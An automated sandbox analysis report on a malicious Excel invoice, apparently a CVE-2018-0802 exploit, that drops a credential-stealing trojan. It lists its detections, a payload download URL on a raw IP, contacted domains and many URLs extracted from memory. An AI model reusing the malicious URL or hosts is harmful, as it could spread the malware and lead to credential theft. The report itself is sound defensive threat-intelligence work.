IPs or domains 17->34 22 C:\Windows\System32\drivers\etc\hosts, ASCII 17->22 dropped 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->46 48 Tries to steal Mail credentials (via file / registry access) 17->48 50 Tries to harvest and steal ftp login credentials 17->50 52 2 other signatures 17->52 file11 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Revised Invoice.xlsx44%VirustotalBrowse
                  Revised Invoice.xlsx29%ReversingLabsDocument-Office.Exploit.CVE-2018-0802

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\regasm_svchost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exe38%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exe73%ReversingLabsWin32.Trojan.Woreflint
                  C:\Users\Public\regasm_svchost.exe38%MetadefenderBrowse
                  C:\Users\Public\regasm_svchost.exe73%ReversingLabsWin32.Trojan.Woreflint

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  6.0.regasm_svchost.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                  6.0.regasm_svchost.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                  6.0.regasm_svchost.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                  6.0.regasm_svchost.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                  6.0.regasm_svchost.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                  6.2.regasm_svchost.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  c-0001.c-msedge.net0%VirustotalBrowse
                  bluemix.cl0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                  http://www.a-cert.at0E0%URL Reputationsafe
                  http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                  http://www.e-me.lv/repository00%URL Reputationsafe
                  http://www.acabogacia.org/doc00%URL Reputationsafe
                  http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                  http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                  http://www.chambersign.org10%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                  http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                  https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                  http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                  http://107.174.138.192/ObliNMm2L89TSKT.exe100%Avira URL Cloudmalware
                  http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                  http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                  http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                  http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                  http://mail.bluemix.cl0%Avira URL Cloudsafe
                  http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                  http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                  http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                  http://www.sk.ee/cps/00%URL Reputationsafe
                  http://www.certicamara.com00%URL Reputationsafe
                  http://www.globaltrust.info0=0%Avira URL Cloudsafe
                  http://bluemix.cl0%Avira URL Cloudsafe
                  https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  http://www.ssc.lt/cps030%URL Reputationsafe
                  http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                  http://ocsp.pki.gva.es00%URL Reputationsafe
                  http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                  http://www.dnie.es/dpc00%URL Reputationsafe
                  http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                  http://www.trustcenter.de/guidelines00%URL Reputationsafe
                  http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl00%URL Reputationsafe
                  http://www.globaltrust.info00%URL Reputationsafe
                  http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
                  https://www.catcert.net/verarrel0%URL Reputationsafe
                  http://www.disig.sk/ca0f0%URL Reputationsafe
                  http://www.sk.ee/juur/crl/00%URL Reputationsafe
                  http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
                  http://www.quovadis.bm00%URL Reputationsafe
                  http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
                  http://www.trustdst.com/certificates/policy/ACES-index.html00%URL Reputationsafe
                  http://www.firmaprofesional.com00%URL Reputationsafe
                  https://www.netlock.net/docs0%URL Reputationsafe
                  http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl0%URL Reputationsafe
                  http://cps.chambersign.org/cps/publicnotaryroot.html00%URL Reputationsafe
                  http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
                  http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
                  http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                  http://www.acabogacia.org00%URL Reputationsafe
                  https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                  https://ca.sia.it/seccli/repository/CPS00%URL Reputationsafe
                  http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
                  http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
                  http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
                  http://YRNExv3jt4mlOyqgTcLy.com0%Avira URL Cloudsafe
                  http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                  http://www.valicert.com/10%URL Reputationsafe
                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl00%URL Reputationsafe
                  https://ocsp.quovadisoffshore.com00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://cps.chambersign.org/cps/chambersignroot.html00%URL Reputationsafe
                  http://ca.sia.it/secsrv/repository/CRL.der0J0%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://107.174.138.192/ObliNMm2L89TSKT.exej100%Avira URL Cloudmalware
                  http://107.174.138.192/ObliNMm2L89TSKT.exee100%Avira URL Cloudmalware
                  http://www.ancert.com/cps00%URL Reputationsafe
                  http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
                  http://107.174.138.192/ObliNMm2L89TSKT.exettC:100%Avira URL Cloudmalware
                  http://www.echoworx.com/ca/root2/cps.pdf00%URL Reputationsafe
                  https://www.netlock.hu/docs/0%URL Reputationsafe
                  http://www.certplus.com/CRL/class1.crl00%URL Reputationsafe
                  http://107.174.138.192/ObliNMm2L89TSKT.exe~100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  c-0001.c-msedge.net
                  		13.107.4.50
                  		truefalseunknown
                  bluemix.cl
                  		104.149.221.234
                  		truefalseunknown
                  mail.bluemix.cl
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://107.174.138.192/ObliNMm2L89TSKT.exetrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171202003.00000000071A0000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.a-cert.at0Eregasm_svchost.exe, 00000006.00000002.1171192023.000000000719A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.certplus.com/CRL/class3.crl0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.e-me.lv/repository0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.acabogacia.org/doc0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.chambersign.org/chambersroot.crl0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.chambersign.org1regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.pkioverheid.nl/policies/root-policy0regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://repository.swisssign.com/0regasm_svchost.exe, 00000006.00000003.1135239617.000000000717E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.ssc.lt/root-c/cacrl.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171166899.000000000717C000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171185695.0000000007195000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlregasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://ca.disig.sk/ca/crl/ca_disig.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.certplus.com/CRL/class3P.crl0regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://repository.infonotary.com/cps/qcps.html0$regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.post.trust.ie/reposit/cps.html0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171175726.000000000718A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://mail.bluemix.clregasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.certplus.com/CRL/class2.crl0regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.disig.sk/ca/crl/ca_disig.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://ocsp.infonotary.com/responder.cgi0Vregasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.sk.ee/cps/0regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.certicamara.com0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.globaltrust.info0=regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171180869.0000000007191000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://bluemix.clregasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Eregasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171166899.000000000717C000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171185695.0000000007195000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.ipify.org%regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		low
                      http://www.ssc.lt/cps03regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://ocsp.pki.gva.es0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ssc.lt/root-b/cacrl.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.certicamara.com/dpc/0Zregasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.pki.wellsfargo.com/wsprca.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.dnie.es/dpc0regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.rootca.or.kr/rca/cps.html0regasm_svchost.exe, 00000006.00000002.1171153379.0000000007170000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwregasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.trustcenter.de/guidelines0regasm_svchost.exe, 00000006.00000002.1171047083.00000000063DA000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135069641.00000000063D9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.globaltrust.info0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171180869.0000000007191000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://certificates.starfieldtech.com/repository/1604regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.certplus.com/CRL/class3TS.crl0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.entrust.net/CRL/Client1.crl0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171032156.00000000063CD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.entrust.net/CRL/net1.crl0regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.catcert.net/verarrelregasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.disig.sk/ca0fregasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.e-szigno.hu/RootCA.crlregasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.signatur.rtr.at/current.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sk.ee/juur/crl/0regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.chambersign.org/chambersignroot.crl0regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171202003.00000000071A0000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.quovadis.bm0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.ssc.lt/root-a/cacrl.crl0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.trustdst.com/certificates/policy/ACES-index.html0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.firmaprofesional.com0regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.netlock.net/docsregasm_svchost.exe, 00000006.00000002.1171032156.00000000063CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlregasm_svchost.exe, 00000006.00000003.1135239617.000000000717E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.entrust.net/2048ca.crl0regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://cps.chambersign.org/cps/publicnotaryroot.html0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.e-trust.be/CPS/QNcertsregasm_svchost.exe, 00000006.00000003.1135239617.000000000717E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171180869.0000000007191000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.certicamara.com/certicamaraca.crl0regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0regasm_svchost.exe, 00000006.00000003.1135272175.0000000007193000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171185695.0000000007195000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fedir.comsign.co.il/crl/ComSignCA.crl0regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ocsp.entrust.net03regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://cps.chambersign.org/cps/chambersroot.html0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1171041262.00000000063D4000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135204507.00000000063D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.acabogacia.org0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://api.ipify.org%%startupfolder%regasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
